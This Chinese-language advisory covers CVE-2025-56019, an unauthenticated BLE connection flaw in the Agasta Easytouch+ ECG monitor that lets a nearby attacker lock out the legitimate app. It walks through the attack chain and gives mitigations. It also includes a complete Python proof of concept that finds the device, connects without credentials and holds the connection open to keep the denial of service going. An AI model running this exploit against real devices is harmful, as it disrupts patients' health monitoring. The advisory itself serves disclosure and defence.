CVE-2025-56019 Agasta Easytouch+ BLE未授权访问拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-56019

漏洞类型

不安全权限/拒绝服务（DoS）

CVSS评分

6.5 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Agasta Easytouch+

漏洞概述

CVE-2025-56019是存在于Agasta Easytouch+医疗设备（固件版本9.3.97）中的一种不安全权限漏洞。该漏洞源于设备在蓝牙低功耗（Bluetooth Low Energy，BLE）通信过程中未实施有效的身份认证机制，导致任何处于设备附近的未授权移动应用程序均可在无需任何凭证的情况下成功建立BLE连接。

Agasta Easytouch+是一款便携式心电图（ECG）监测设备，主要用于个人健康监测和医疗数据采集。该设备通过BLE与配套的移动应用程序进行通信，实现数据传输和控制功能。然而，由于缺乏必要的身份验证和访问控制机制，攻击者可以利用任何支持BLE的设备（如智能手机、平板电脑等）在物理邻近范围内（通常为10米以内）连接到目标设备。

更为严重的是，一旦未授权连接成功建立，合法应用程序将无法再与设备建立连接，从而形成拒绝服务（Denial of Service，DoS）状态。这种情况可能导致医疗专业人员无法及时获取患者的ECG数据，影响医疗决策的及时性和准确性，对患者的健康监测造成潜在风险。

该漏洞的CVSS 3.1评分为6.5分，属于中危级别。其攻击向量为邻接网络（AV:A），攻击者无需任何权限（PR:N）且无需用户交互（UI:N），对可用性影响较高（A:H），但对机密性（C:N）和完整性（I:N）无直接影响。该漏洞已于2025年10月2日公开披露，由MITRE分配CVE编号。

技术细节

该漏洞的核心技术问题在于Agasta Easytouch+设备BLE通信协议栈中缺失身份认证和连接控制机制。

在正常的BLE通信过程中，设备应当通过以下机制确保通信安全：1）配对绑定（Pairing/Bonding）过程，交换加密密钥；2）连接白名单机制，仅允许预授权设备连接；3）应用层身份验证，验证客户端应用合法性。

然而，Agasta Easytouch+ 9.3.97版本固件未实现上述任何安全机制。设备在BLE广播阶段未设置连接限制，任何扫描到设备广播的客户端均可发起连接请求。设备接受连接后，未进行身份验证即建立GATT（Generic Attribute Profile）通信通道。

漏洞利用方式如下：
1. 攻击者使用任意BLE兼容设备（如智能手机）扫描附近的BLE设备；
2. 识别目标Agasta Easytouch+设备的广播信号（通常包含设备名称或服务UUID）；
3. 使用通用的BLE连接工具（如nRF Connect、LightBlue等）直接建立连接；
4. 连接建立后，合法应用程序的连接请求将被设备拒绝或中断；
5. 攻击者可保持连接状态，持续阻止合法应用访问设备，造成持久性拒绝服务。

攻击者无需具备特殊权限或进行社会工程学攻击，仅需物理接近目标设备即可实施攻击，对部署在公共场所或多人共享使用环境中的设备构成较大威胁。

攻击链分析

STEP 1

步骤1：侦察阶段

攻击者使用BLE扫描工具（如nRF Connect、LightBlue或自定义脚本）扫描周围环境中的BLE设备，识别Agasta Easytouch+设备的广播信号和MAC地址。

STEP 2

步骤2：定位目标

通过设备名称、广播数据中的服务UUID或其他可识别特征确认目标设备位于物理邻近范围内（通常BLE有效距离为10-30米）。

STEP 3

步骤3：建立未授权连接

使用任意BLE客户端直接向目标设备发起连接请求，由于设备未实施身份验证机制，连接请求被直接接受，无需任何凭证。

STEP 4

步骤4：触发拒绝服务

未授权连接建立后，设备资源被占用，合法应用程序的连接请求被拒绝或中断，导致医疗数据无法正常传输。

STEP 5

步骤5：维持DoS状态

攻击者保持连接持续存在，持续阻止合法用户访问设备功能，对医疗监测服务造成持久性中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-56019 - Agasta Easytouch+ BLE Unauthorized Access DoS PoC
This PoC demonstrates how an attacker can establish an unauthorized BLE connection
to Agasta Easytouch+ devices, causing a denial of service for legitimate applications.
"""

import asyncio
from bleak import BleakScanner, BleakClient

# Target device name pattern for Agasta Easytouch+
TARGET_DEVICE_NAME = "Easytouch"

async def scan_and_identify_target():
    """Scan for nearby BLE devices and identify Agasta Easytouch+ device"""
    print("[*] Scanning for nearby BLE devices...")
    devices = await BleakScanner.discover()
    
    for device in devices:
        if device.name and TARGET_DEVICE_NAME.lower() in device.name.lower():
            print(f"[+] Target device found: {device.name} ({device.address})")
            return device
    
    print("[-] No Agasta Easytouch+ device found in range")
    return None

async def exploit_ble_unauthorized_access(target_device):
    """
    Establish unauthorized BLE connection without authentication,
    causing legitimate applications to be unable to connect (DoS)
    """
    print(f"[*] Attempting unauthorized connection to {target_device.address}...")
    
    try:
        # Connect without any authentication - this is the core vulnerability
        async with BleakClient(target_device.address) as client:
            print(f"[+] Unauthorized connection established successfully!")
            print(f"[+] Connection is active. Legitimate apps cannot connect now.")
            print(f"[+] DoS condition achieved - keeping connection alive...")
            
            # Keep the connection alive to maintain DoS condition
            while await client.is_connected():
                print(f"[*] Connection still active. Press Ctrl+C to release.")
                await asyncio.sleep(5)
                
    except Exception as e:
        print(f"[-] Connection failed: {e}")

async def main():
    """Main exploit function"""
    print("=" * 60)
    print("CVE-2025-56019 PoC - Agasta Easytouch+ BLE DoS")
    print("=" * 60)
    
    target = await scan_and_identify_target()
    if target:
        await exploit_ble_unauthorized_access(target)

if __name__ == "__main__":
    # Requirements: pip install bleak
    asyncio.run(main())

影响范围

Agasta Easytouch+ 9.3.97

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）在物理层面限制设备的使用环境，避免在公共场所或不安全区域使用；2）使用BLE信号屏蔽袋或法拉第笼在不使用时存放设备；3）定期监控设备的BLE连接状态，发现异常连接时重启设备；4）限制设备的物理访问权限，仅允许授权人员在受控环境下使用；5）关注厂商安全公告，及时获取并应用安全更新。